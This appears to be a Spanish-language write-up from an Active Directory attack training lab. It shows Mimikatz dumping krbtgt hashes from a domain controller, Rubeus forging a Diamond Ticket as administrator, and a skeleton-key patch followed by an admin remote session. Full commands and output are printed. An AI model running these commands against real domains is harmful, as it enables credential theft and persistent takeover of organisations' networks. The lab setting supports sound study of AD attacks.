Learning Objective - 10

Creando Diamond Ticket

PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /inject /name:krbtgt" "exit"' -Computername dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /inject /name:krbtgt
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 4e9815869d2090ccfca61c1fe0d23986
    LM   :
  Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
    ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
    lm  - 0: ea03581a1268674a828bde6ab09db837

 * WDigest
    01  a0e60e247b498de4cacfac3ba615af01
    02  86615bb9bf7e3c731ba1cb47aa89cf6d
    03  637dfb61467fdb4f176fe844fd260bac
    04  a0e60e247b498de4cacfac3ba615af01
    05  86615bb9bf7e3c731ba1cb47aa89cf6d
    06  d2874f937df1fd2b05f528c6e715ac7a
    07  a0e60e247b498de4cacfac3ba615af01
    08  e8ddc0d55ac23e847837791743b89d22
    09  e8ddc0d55ac23e847837791743b89d22
    10  5c324b8ab38cfca7542d5befb9849fd9
    11  f84dfb60f743b1368ea571504e34863a
    12  e8ddc0d55ac23e847837791743b89d22
    13  2281b35faded13ae4d78e33a1ef26933
    14  f84dfb60f743b1368ea571504e34863a
    15  d9ef5ed74ef473e89a570a10a706813e
    16  d9ef5ed74ef473e89a570a10a706813e
    17  87c75daa20ad259a6f783d61602086aa
    18  f0016c07fcff7d479633e8998c75bcf7
    19  7c4e5eb0d5d517f945cf22d74fec380e
    20  cb97816ac064a567fe37e8e8c863f2a7
    21  5adaa49a00f2803658c71f617031b385
    22  5adaa49a00f2803658c71f617031b385
    23  6d86f0be7751c8607e4b47912115bef2
    24  caa61bbf6b9c871af646935febf86b95
    25  caa61bbf6b9c871af646935febf86b95
    26  5d8e8f8f63b3bb6dd48db5d0352c194c
    27  3e139d350a9063db51226cfab9e42aa1
    28  d745c0538c8fd103d71229b017a987ce
    29  40b43724fa76e22b0d610d656fb49ddd

 * Kerberos
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 150ea2e934ab6b80

 * Kerberos-Newer-Keys
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
      aes128_hmac       (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
      des_cbc_md5       (4096) : 150ea2e934ab6b80

 * NTLM-Strong-NTOWF
    Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

mimikatz(powershell) # exit
Bye!

Utilizando el aes256_hmac, creamos el ticket e instanciamos una shell.

PS C:\AD\Tools> .\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:student723 /password:xxxxxxxxxxxxxx /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Diamond Ticket

[*] Showing process : True
[*] Username        : OCPBBF9Y
[*] Domain          : 2M2G4XL4
[*] Password        : 2WCYITLX
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 6388
[+] LUID            : 0x483ae62

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!]     AES256 Salt: DOLLARCORP.MONEYCORP.LOCALstudent723
[*] Using aes256_cts_hmac_sha1 hash: 8A55FB08BBBD0F30FEA2CEC44BF8548B4291230F6BFEE5107B45059484EAF75C
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\student723'
[*] Target LUID : 75738722
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGVzCCBlOgAwIBBaEDAgEWooIFKzCCBSdhggUjMIIFH6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
      BMcwggTDoAMCARKhAwIBAqKCBLUEggSxwiI+1/R+w0vV13bdp7J7cJ2HMMqrqP1QfCP6fvFUNhpVVuw4
      gSfQIyUiDq6XcFzHkG7eMBC0lWfsE53F2tU4ml5fjv0WaAG8SciImS4QjTYugYAi7ry4N9JtWcuKO/D1
      IERh4nm5n3Rs2CymeXP0ZqvVGWV6D3RdHHvHawuAhDqjQp1KlB6RegcenpKX42cqIaXwcKhexzJfu8oy
      +RSurqGadDL6R78f0nVlk8jILwkLUJwPqNvk585ysYttdYIkozzhZ3LCi9KdIrJUFRO6LS2FzLKChjcO
      SP1Wa2A3SXpAjMmsk8HprpeunssaobfKXJTz5hwTVRsj0U3dxCqECbcFLZR6bYU2xfXdpEI2EPA9vUsN
      fwnXd4vERQSZWZP8YqNuVqUAOKuLlfAb1804QRdXMUvX/3Uo6uGwWTKSnLC0I3wjqWT892trMurBFfbo
      H+PaWNECh4Qbv37whxpU13wKALXWENiEBq8taBLiSK9KpZxyC5yuLanFPA8BbM3hDeH85g9CYZitlQqo
      jdXciJMZalUa3n7IY0IcFdKoKUX6z8//IT/GhNWspEc0sJYGTrujU+uUrFKkiAgjkhGB4xL+RZcBWXQs
      GtcPPNd5y5wi697iFZndEaxSMLFKDL74C9ZyqXaI3ElAsz8NUBBfOhEuZZzI+vRZldc2DEehylFddNFK
      RVYXKqeDJbdQWFQq6BgFH/cw+jSzZ/r6ZYLw3Tb/0XIaO/Mi0Yz+IzmX9UgCNvcqaxmHaSJ8CQNAszqa
      bH1I5EHsxHdKB3KcWDlgVBctJbvUl3j9T9aw0ytqOVaaVIC8vGkR0JdU0Qno+YIFphj0PgtO0KIBeN4T
      P5kbvyam0DyqjhTzOE1DKcQWIl2bdJPqpYIGhm26Q9Dyfik340tM1mzvCbwRvqnVVeIwNERSta7XHYIO
      52CjoLjznKEHm4BAQcvFxO+zjr1qA6Xjym+/vxSkd0Pd1n1c180owcs+p+CKBtvSQ8p0pYCorfMIHYWu
      eui4sFRu8HyNF2UC3/Q5PCRn1xyGM/4qKeXZWQxuCDAZdxhbF+nzIvuLN1V9WR1j1BprGjczUvW9dtti
      Lnt9rFYdUwiAFCmWxqBg2B5Ulf6h2BHtIGQYRZP39JsMb8Srfiy2lAVfHxsD03Eesuk5lI3mUNrsTjNU
      6C8DWHpFMBLstVESH+16kTBGRZFQtqbcUZ71U1jvD8a2UJdeWWQmZvGZyAj4GguMzgq0w6gLTFSFGa0P
      hk7s44VV0TiwTONminz+RUYi//TT6ZcLXQHiVQL7xmvtjkXGRW/nyfQjQYEv5K/RzyBjjgljTxONBq93
      v5PTaFRJJrlCwLL6kubj9ZFlNFBKYJ14WzU6OY7sdt7+YIZe97wX/liCeYK4HmJ42X84MkzJfvZzYyK+
      5OTsshd7/TlW8E/uLTm/MhfyODNLwYntfBW0pi1VAvab3PRVU1EEZSfW/akOtQEQ2QWgS/aAhqqKrM2X
      /AdiaUhZFsCBCWL/L1EJV3thDsFOKhHNXfglsmMycvJyO2svKrJcUAm5YQ2wxLzj75kVhbMZAO3CD6dZ
      eW4/pNoE3q9Waqt3vFwaVnE1wpBy9+STUaOCARYwggESoAMCAQCiggEJBIIBBX2CAQEwgf6ggfswgfgw
      gfWgKzApoAMCARKhIgQgvIokGsQQvfbVuWul2dBijv/QM9EytijM8w/ONP4bC4ahHBsaRE9MTEFSQ09S
      UC5NT05FWUNPUlAuTE9DQUyiFzAVoAMCAQGhDjAMGwpzdHVkZW50NzIzowcDBQBA4QAApREYDzIwMjQw
      MjI2MDA0MzA5WqYRGA8yMDI0MDIyNjEwNDMwOVqnERgPMjAyNDAzMDQwMDQzMDlaqBwbGkRPTExBUkNP
      UlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09S
      UC5MT0NBTA==
[*] Target LUID: 0x483ae62
[+] Ticket successfully imported!

[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

      doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
      BNIwggTOoAMCARKhAwIBA6KCBMAEggS8AhejkVgrpMoCDNkEX4VYnzrEE0xuEFa5u2gBtxj+e9D1R7xu
      yRdsoOR7wfznv7q5wzbIMNaxDp7h962XB8Ous9ffU+plwzadZwnQXHDPxp0SBF6kvCRcN777evjxXhCG
      ePVsw/W0WkmJn2xWV0c9bE6Xm71JCCLwyigs4HJQ0cUR4nrYDYiJ4wfyQlrHdbSugzXMKUI08KSCd9IC
      20zxYqsVMjnPh0oYgIsqXLRN0cVwfMmC52qdHqRukgu2MicflW8+/Kl6gsbTsq/OjtOX6H351YCa8Fl/
      ooV2CCw1Na4SOMV53Eyr6aV8v0Fso+2rJAebbV+NjQsb7mI94bLMjLSJjhbbebaf04E1+LaeOOCrig2Q
      piPY9tmsvqrrCw7grJ7+TdtauMA/+JtZ8QteHU/CTXke8eDiCOqSp9xFDceFcA9CkUeOSJ9QyblepW93
      USlti/LzwOMPGQKAADWnUxiFYGv25cr3t+y0RALDa4jO7dTCmbceIjfLaqfw94VL34gR73+vWH8sHumw
      eEgqb7ky6CwN54NE8KJ3Z3t6rpMOla2aU7NUsVtRkWx4v2zUFmam8rtvR6zPg+qW3MM1AZ+ah6v5dth3
      DkSN2XDZSj8RS8t3nG+iFPf2DZymvGBmhLVDuE71Whm0SsXaxyPJsu42wuNqpUJOweiLySu5FIG1FYmH
      hJ654dMp4HnByP2p9iOJmml9VebsqMZy+cvWmz6CLeZrHT4Q4Vfg7NMwh90/1dFcWcaYTJ5Dzd4WJuo7
      abVZ6r5wFu5vsCMeYJHKuccUuIocQ7UX7M4BHihG9U8lp+nucGDAEBV3Y5rKgkIM34NC3I0+GCJkq+c5
      +2/a+dKJXFy5FvucMHVRjB6T621akfT36kexH/QV/+IiYk6eoHtG4njbZLahbEpFoNJqvfOiTs1EvRbr
      5pIUNw5uaLDvcdVdakG3alZSUDRlpKWBkSTcadrYwzimmvag6BUT4lTJE/s4nI6L8PDqPpHZO74X0cNN
      DoAHUB8rd75PsNZwz5KGFt13PTTkl39dtn+lFFxMJj5/ERnUv/zhmteSUTEAZm3gdXiSZaqpTTDoRnJ/
      bD1ahus9ddZdncx33hKmKU7WfxTjvm7qaMF973IHcvMj56yuvtY+wkjxIFnf+dA9Orvkg/W8Y/2/ayW8
      cbxa/XZpxNgVFsxGBi0NrqR8PRUW5BFuEEjR9/HavRafj1PR5NoLhYyi+0hcf9rFivzjOi7jEJ1pUPll
      R+gUREnXvEBCmTaAibRcmkgHqEffsNGK3xzSe7/DxiK5CdiYEYy9YjjeG/YaZIjoT8lZYsecMRF/8Caq
      +qNKLuFW72lQIeDTVW4x0P6zH87z+9oro2maEai1PxDoB8XN7URr8vEh/K7NxMngF8BzYo4vox837YAk
      eu/T6VTqOqctJ0XKs0n/Xsrk6AuawUJX8Y72LzU8HJo9sF0c2g83BBs3PPSC8LLa4dHBIZBOiueQOHH3
      Xp8W9Ng5F17gFsWx9eUeViw8xKUM600YvbpK4OHM62TIHo6ojpSqFgGJvcSKMizbZmrC/7DHXcQZVUxc
      pGpEAPdUJlM2oYbYMhQtSxBeI00u753D7qfigMosMFPa24XNo4IBGjCCARagAwIBAKKCAQ0EggEJfYIB
      BTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgvIokGsQQvfbVuWul2dBijv/QM9EytijM8w/ONP4bC4ah
      HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcD
      BQBA4QAApREYDzIwMjQwMjI2MDA0MzA5WqYRGA8yMDI0MDIyNjEwNDMwOVqnERgPMjAyNDAzMDQwMDQz
      MDlaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xM
      QVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==


[*] Target LUID: 0x483ae62
[+] Ticket successfully imported!

Tambien puedes usarlo sin credenciales usando /tgtdeleg.

Rubeus.exe diamond
/krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg
/enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorpdc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512
/createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Funciona de la misma manera :).

Skeleton Key

PS C:\AD\Tools> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Creando sesion en cualquier computador con la password 'mimikatz'

PS C:\AD\Tools> Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp\administrator

More info: 157 pag.

PreviousLearning Objective - 8 y 9 NextLearning Objective - 11

Last updated 1 year ago

hashtagCreando Diamond Ticket

hashtagSkeleton Key

Creando Diamond Ticket

Skeleton Key